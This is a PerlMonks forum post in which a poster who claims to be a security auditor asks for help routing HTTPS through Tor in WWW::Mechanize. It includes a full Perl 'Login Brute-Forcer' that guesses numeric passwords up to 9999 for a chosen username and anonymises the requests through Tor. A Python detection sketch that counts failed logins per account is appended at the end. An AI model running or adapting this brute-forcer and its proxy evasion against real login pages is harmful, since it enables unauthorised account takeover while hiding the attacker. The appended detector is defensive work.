PerlMonks  

Kind Monks,
I have a rather peculiar problem. Before I get to it, let me describe my situation (or you can skip to 'PROBLEM'), so you may understand my intentions are noble. I am a security auditor for my company, and my task is to find the vulnerable holes before malicious hackers do. My current project involves auditing their timesheet login page. My goal is to test for weak passwords, namely, the numeric possibilities from 1-9999 (I have my own list of usernames). I have coded a rudimentary Perl program that handles the requests and logs the requests nicely. However, I am requested to perform the audit from an outsider's perspective, i.e., no prior knowledge of the company. In keeping with the spirit of my directive, I'm using Tor to anonymize the connections. Tor runs as a proxy on localhost, and redirects the connections from there. It handles HTTP and HTTPS fine on my web browser, but not with my script. That brings me to my...

PROBLEM:
I cannot get SSL connections to use a proxy specified through WWW::Mechanize. HTTP connections appear to correctly filter through the proxy. Proxy is running on 127.0.0.1:8118, and handles HTTP/HTTPS fine. Netmon confirms these suspicions about TCP/SSL traffic from my script being handled differently.

SOLUTIONS ATTEMPTED:
1. Setting HTTP_Proxy and HTTPS_Proxy environment variables by hand
2. Using 'use Crypt::SSLeay'
3. Trying alternate proxy (web proxies)
What follows is the code for my program (naturally sanitized to remove sensitive info). I have searched far and wide for the answer, but cannot get a working solution. Monks, can you help me? It would be most appreciated.

CODE:

    #!/usr/bin/perl
    #Thanks to IBM for helping to create this - Bret Sweeden especially
    #NBTDOTM
    use WWW::Mechanize;
    use HTTP::Cookies;
    #$ENV{HTTPS_PROXY} = '127.0.0.1:8118';
    #$ENV{HTTP_PROXY} = '127.0.0.1:8118';

    #Determine the number of arguments the user has given us
    $NumArgs = $#ARGV + 1;
    if ($NumArgs == 0) {
        #Our user has not entered any information. Display help screen.
        header();
        exit();
    }
    elsif ($NumArgs == 1) {
        #Our user has only entered some information. Display help screen.
        header();
        exit();
    }
    if ($NumArgs == 2) {
        #Our user has entered enough for an attack. Begin!
        $host = $ARGV[0]; #Host is the first argument supplied
        $user = $ARGV[1]; #Username is the 2nd argument supplied
        #Display header
        print qq{
    ----------------------------------------------------------------------
    Login Brute-Forcer
    Custom Built by Juno
    NBTDOTM
    ----------------------------------------------------------------------
    };
        print "\nYour host is: $host";
        print "\nYour username is: $user";
        print "\n\nThe program will now try bruteforcing the host you selected";
        my $url = $host;
        my $username = $user;

        #1-9
        for $i (1 .. 9) {
            print "\nTrying password 000$i...";
            my $outfile = "000" . $i . ".htm";
            my $password = "000" . $i;
            my $mech = WWW::Mechanize->new();
            $mech->cookie_jar(HTTP::Cookies->new());
            $mech->proxy(['http', 'https'], 'http://127.0.0.1:8118/', 'https://127.0.0.1:8118/');
            $mech->get($url);
            $mech->field(j_username => $username);
            $mech->field(j_password => $password);
            $mech->click();
            $mech->click();
            my $output_page = $mech->content();
            open(OUTFILE, ">$outfile");
            print OUTFILE "$output_page";
            close(OUTFILE);
            print " Done.";
        }

        #10-99
        for $i (10 .. 99) {
            print "\nTrying password 00$i...";
            my $outfile = "00" . $i . ".htm";
            my $password = "00" . $i;
            my $mech = WWW::Mechanize->new();
            $mech->cookie_jar(HTTP::Cookies->new());
            $mech->get($url);
            #$mech->form_name('j');
            $mech->field(j_username => $username);
            $mech->field(j_password => $password);
            $mech->click();
            $mech->click();
            my $output_page = $mech->content();
            open(OUTFILE, ">$outfile");
            print OUTFILE "$output_page";
            close(OUTFILE);
            print " Done.";
        }

        #100-999
        for $i (1 .. 9) {
            print "\nTrying password 0$i...";
            my $outfile = "0" . $i . ".htm";
            my $password = "0" . $i;
            my $mech = WWW::Mechanize->new();
            $mech->cookie_jar(HTTP::Cookies->new());
            $mech->get($url);
            #$mech->form_name('j');
            $mech->field(j_username => $username);
            $mech->field(j_password => $password);
            $mech->click();
            $mech->click();
            my $output_page = $mech->content();
            open(OUTFILE, ">$outfile");
            print OUTFILE "$output_page";
            close(OUTFILE);
            print " Done.";
        }

        #1000-9999
        for $i (1000 .. 9999) {
            print "\nTrying password $i...";
            my $outfile = $i . ".htm";
            my $password = $i;
            my $mech = WWW::Mechanize->new();
            $mech->cookie_jar(HTTP::Cookies->new());
            $mech->get($url);
            #$mech->form_name('j');
            $mech->field(j_username => $username);
            $mech->field(j_password => $password);
            $mech->click();
            $mech->click();
            my $output_page = $mech->content();
            open(OUTFILE, ">$outfile");
            print OUTFILE "$output_page";
            close(OUTFILE);
            print " Done.";
        }
    }
    print "\n\nAudit complete!";
    exit();

    sub header{
        print qq{
    ----------------------------------------------------------------------
    Login Brute-Forcer
    Custom Built by Juno
    NBTDOTM
    ----------------------------------------------------------------------
    Usage: GHGbrute -[target site] -[user]
    Example: GHGbrute somesite.com -admin
    The program will attempt a numerical bruteforce to four places.
    };
    }


In reply to Using Mech with HTTPS by Juno
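
For whoever defends the login page under audit: guesses against one username that are relayed through Tor can arrive from many source addresses, so failures have to be counted per account, not per source IP. The sketch below is an added example, not part of the original post; the log format, the thresholds and the sample lines are constructed for illustration.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=5)   # assumed policy value, tune per site
MAX_FAILS = 10                  # assumed policy value, tune per site

def parse(line):
    """Constructed log format: '<ISO time> <src_ip> <user> <OK|FAIL>'."""
    ts, ip, user, result = line.split()
    return datetime.fromisoformat(ts), ip, user, result

def detect(lines, key):
    """Return the users (key='user') or source IPs (key='ip') that
    exceed MAX_FAILS failed logins inside any sliding WINDOW."""
    recent = defaultdict(deque)   # key -> timestamps of recent failures
    flagged = set()
    for line in lines:
        ts, ip, user, result = parse(line)
        if result != "FAIL":
            continue
        k = user if key == "user" else ip
        q = recent[k]
        q.append(ts)
        while q and ts - q[0] > WINDOW:   # drop failures older than WINDOW
            q.popleft()
        if len(q) > MAX_FAILS:
            flagged.add(k)
    return flagged

def sample_log():
    """Constructed sample: 40 failures for one account, each from a
    different source address, plus one ordinary mistyped login."""
    start = datetime(2024, 1, 1, 9, 0, 0)
    lines = []
    for i in range(40):
        ts = start + timedelta(seconds=3 * i)
        lines.append(f"{ts.isoformat()} 198.51.100.{i + 1} jsmith FAIL")
    t1 = start + timedelta(seconds=10)
    t2 = start + timedelta(seconds=20)
    lines.append(f"{t1.isoformat()} 203.0.113.7 alice FAIL")
    lines.append(f"{t2.isoformat()} 203.0.113.7 alice OK")
    return sorted(lines)          # ISO timestamps sort chronologically

if __name__ == "__main__":
    log = sample_log()
    print("flagged by account:", detect(log, "user"))
    print("flagged by source IP:", detect(log, "ip"))
```

On the sample, the per-account counter flags the targeted username while the per-IP counter flags nothing, which is the gap a per-IP throttle leaves open.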
